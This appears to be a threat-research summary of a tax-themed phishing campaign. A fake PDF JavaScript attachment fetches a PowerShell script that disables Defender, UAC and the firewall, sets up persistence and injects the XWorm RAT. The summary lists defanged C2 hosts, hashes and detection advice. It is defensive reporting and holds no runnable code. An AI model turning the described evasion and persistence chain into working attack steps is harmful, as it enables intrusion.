Threat Research

Don’t Take the Bait: The XWorm Tax Scam

Esentire

eSentire’s TRU investigated a tax-themed phishing campaign that delivered XWorm v5.2 as the final payload after a malicious JavaScript attachment executed and fetched a PowerShell script from a remote host. The attack chain included process termination, Defender exclusion modifications, disabling of security controls, persistence via scheduled tasks and Registry Run Keys, and C2 communication to 91.92.243[.]28. #XWorm #eSentire

Keypoints

  • Initial access achieved via a phishing email with a malicious JavaScript attachment named “Tax-docs-2023.pdf .js” downloaded from a compromised site.
  • The JS executed under wscript.exe and retrieved a PowerShell script (atom.xml) from 91.92.243[.]28 that performed the main malicious actions.
  • The PowerShell script terminated specific processes, dropped a decoy PDF, injected the XWorm RAT into legitimate processes (Msbuild.exe and RegSvcs.exe), and added Defender exclusions to evade detection.
  • Attackers disabled security features including UAC and Windows Firewall and modified Defender settings to reduce detection likelihood.
  • Persistence was established via Scheduled Tasks and Registry Run Keys (tasks renamed to “intuiteupdater”/”Drakeupdater” and registry run entries), with secondary downloads from pdfdatamanage.serveftp[.]com and MediaFire-hosted decoy files.
  • The final payload was XWorm v5.2 (MD5: fc422800144383ef6e2e0eee37e7d6ba) configured to use C2 91.92.243[.]28:4444 with a listed AES key and an install file named USB.exe.
  • eSentire’s SOC isolated the affected device and provided remediation and detection resources (YARA rule and IOCs).

MITRE Techniques

  • [T1566] Phishing – Initial access through a malicious email attachment: ‘the initial infection vector is via the phishing email, as suggested by the infection chain.’
  • [T1059] Command and Scripting Interpreter – Execution of a JavaScript via Windows Script Host and subsequent PowerShell script retrieval: ‘The JS file executes under Windows script host (wscript.exe) which retrieves and executes the atom.xml file.’
  • [T1105] Ingress Tool Transfer – Downloading secondary payloads and decoys from external hosts (MediaFire and remote IP): ‘The decoy PDF … is retrieved from MediaFire’ and atom.xml was retrieved from 91.92.243[.]28/poom/atom.xml.
  • [T1055] Process Injection – Injecting the final XWorm payload into legitimate processes: ‘Injecting the final payload into Msbuild.exe and RegSvcs.exe processes.’
  • [T1562.001] Impair Defenses: Disable or Modify Tools – Modifying Windows Defender exclusions and disabling security features to evade detection: ‘Adding a list of file extensions, paths, and processes to the Windows Defender exclusions list’ and ‘Disabling Windows Defender security features.’
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass UAC – Disabling or bypassing UAC so applications can run elevated without prompts: ‘Disabling UAC, meaning that applications can run with elevated privileges without prompting the user.’
  • [T1053.005] Scheduled Task/Job – Establishing persistence via scheduled tasks (e.g., “intuiteupdater” task execution): ‘Setting up the persistence via Scheduled Tasks.’
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – Persistence via Registry Run Keys with entries that trigger mshta and PowerShell downloads: ‘Persistence via Registry Run Keys’ and reference to registry entries launching mshta to download commands from pdfdatamanage.serveftp[.]com.

Indicators of Compromise

  • [File Hash] Malicious files – 5706efd7e0254105261057a82308ed72 (Tax-docs-2023.pdf .js), c1614e86b6808df891c5d7310d089211 (atom.xml), and 2 more hashes including fc422800144383ef6e2e0eee37e7d6ba (XWorm payload).
  • [File Name] Dropped/decoy files – “Tax-docs-2023.pdf .js” (malicious JS), “James_Charles_Tax_2023.pdf” (decoy), USB.exe (install filename for XWorm).
  • [Domain/URL] Malicious hosting and download locations – spnmandalawangi.banten.polri.go[.]id/Tax_docs_2023.htm (compromised site serving the JS), pdfdatamanage.serveftp[.]com/docs.pdf (secondary download, offline at analysis time), MediaFire (decoy PDF host).
  • [IP / C2] Command and Control – 91.92.243[.]28 (host serving atom.xml and listed C2) on port 4444.

eSentire’s TRU analysis shows a compact, multi-stage attack chain beginning with a phishing email that delivers a JavaScript attachment masquerading as a PDF. When executed under Windows Script Host (wscript.exe), the JS fetches a PowerShell script (atom.xml) from 91.92.243[.]28; that PowerShell payload terminates selected processes, drops and opens a decoy PDF (retrieved from MediaFire), and injects the XWorm RAT into legitimate processes (Msbuild.exe and RegSvcs.exe).

The PowerShell script also modifies Windows Defender exclusions, disables security controls including UAC and Windows Firewall, and establishes persistence through scheduled tasks and Registry Run Keys (tasks initially named “loratask”/”tasklorraalman” renamed to “intuiteupdater”/”Drakeupdater”, with mshta invoked to pull further PowerShell commands from pdfdatamanage.serveftp[.]com). The final implant is XWorm v5.2 (MD5: fc422800144383ef6e2e0eee37e7d6ba) configured to contact C2 91.92.243[.]28:4444 with an embedded AES key and an install filename “USB.exe.”

Detection and mitigation focus should include blocking the identified hosts and hashes, monitoring for script execution via wscript/mshta and unexpected msbuild/RegSvcs activity, auditing Defender exclusion changes and scheduled task/registry run key creations, and enforcing email attachment handling (open-with set to text editor) to prevent direct script execution.

Read more: https://www.esentire.com/blog/dont-take-the-bait-the-xworm-tax-scam

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint